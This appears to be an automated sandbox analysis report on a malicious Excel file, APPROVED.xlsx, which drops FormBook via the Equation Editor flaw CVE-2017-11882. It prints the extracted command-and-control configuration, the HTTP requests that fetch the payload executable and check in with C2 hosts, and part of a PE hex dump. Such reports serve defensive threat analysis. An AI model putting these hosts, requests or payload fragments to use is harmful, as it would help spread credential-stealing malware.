Analysis Report APPROVED.xlsx

Overview

General Information

Sample Name: APPROVED.xlsx
Analysis ID: 413096
MD5: 09d492cf4937df0290af0be36ba30421
SHA1: 4ad8665febc2f0524d0b23c8f94d947e1a563e14
SHA256: c0697b83e4d63f9a380466b91ba7db94e823b7a2fd137811bfcce5796a9b82f6
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
Multi AV Scanner detection for submitted file
Source: APPROVED.xlsx ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 8.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdb source: vbc.exe, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, explorer.exe
Source: Binary string: explorer.pdb source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdbh source: vbc.exe, 00000004.00000002.2151563450.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004F42C8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004F42B8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 8_2_00416282
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 8_2_00406A94
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4x nop then pop edi 11_2_00096282
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4x nop then pop ebx 11_2_00086A95
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.hfjxhs.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 3.36.53.50:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 3.36.53.50:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 75.2.66.247:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 75.2.66.247:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 75.2.66.247:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.adultpeace.com/p2io/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.zmzcrossrt.xyz
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 May 2021 06:29:20 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Thu, 13 May 2021 06:24:23 GMTETag: "1bf800-5c2302daaa325"Accept-Ranges: bytesContent-Length: 1832960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d c5 9c 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e6 1b 00 00 10 00 00 00 00 00 00 92 05 1c 00 00 20 00 00 00 20 1c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 05 1c 00 4f 00 00 00 00 20 1c 00 d0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1c 00 0c 00 00 00 08 04 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 e5 1b 00 00 20 00 00 00 e6 1b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0c 00 00 00 20 1c 00 00 0e 00 00 00 e8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1c 00 00 02 00 00 00 f6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 05 1c 00 00 00 00 00 48 00 00 00 02 00 05 00 54 6d 04 00 34 8e 03 00 03 00 00 00 01 00 00 06 88 fb 07 00 80 08 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2c 00 00 0a 28 2d 00 00 0a 00 de 02 00 dc 00 28 08 00 00 06 02 6f 2e 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2f 00 00 0a 00 02 16 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 17 28 32 00 00 0a 00 02 16 28 33 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 21 07 00 06 28 34 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 1a 07 00 06 28 35 00 00 0a 00 2a 26 00 02 28 36 00 00 0a 00 2a ce 73 37 00 00 0a 80 01 00 00 04 73 38 00 00 0a 80 02 00 00 04 73 39 00 00 0a 80 03 00 00 04 73 3a 00 00 0a 80 04 00 00 04 73 3b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 01
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=DTtQlm+ek3aiRXh2XrobrkMYYvpq+NlfspfnNNuMzI98GFQb/uTk0N0e6q4XVVELH/G/Eg==&Mj=8pGl2P HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&Mj=8pGl2P HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P HTTP/1.1Host: www.zmzcrossrt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.65.7 104.21.65.7
Source: Joe Sandbox View IP Address: 54.85.86.211 54.85.86.211
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /dose/xele.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.36.53.50Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75056775.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /dose/xele.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.36.53.50Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=DTtQlm+ek3aiRXh2XrobrkMYYvpq+NlfspfnNNuMzI98GFQb/uTk0N0e6q4XVVELH/G/Eg==&Mj=8pGl2P HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&Mj=8pGl2P HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P HTTP/1.1Host: www.zmzcrossrt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: www.hfjxhs.com
Source: explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
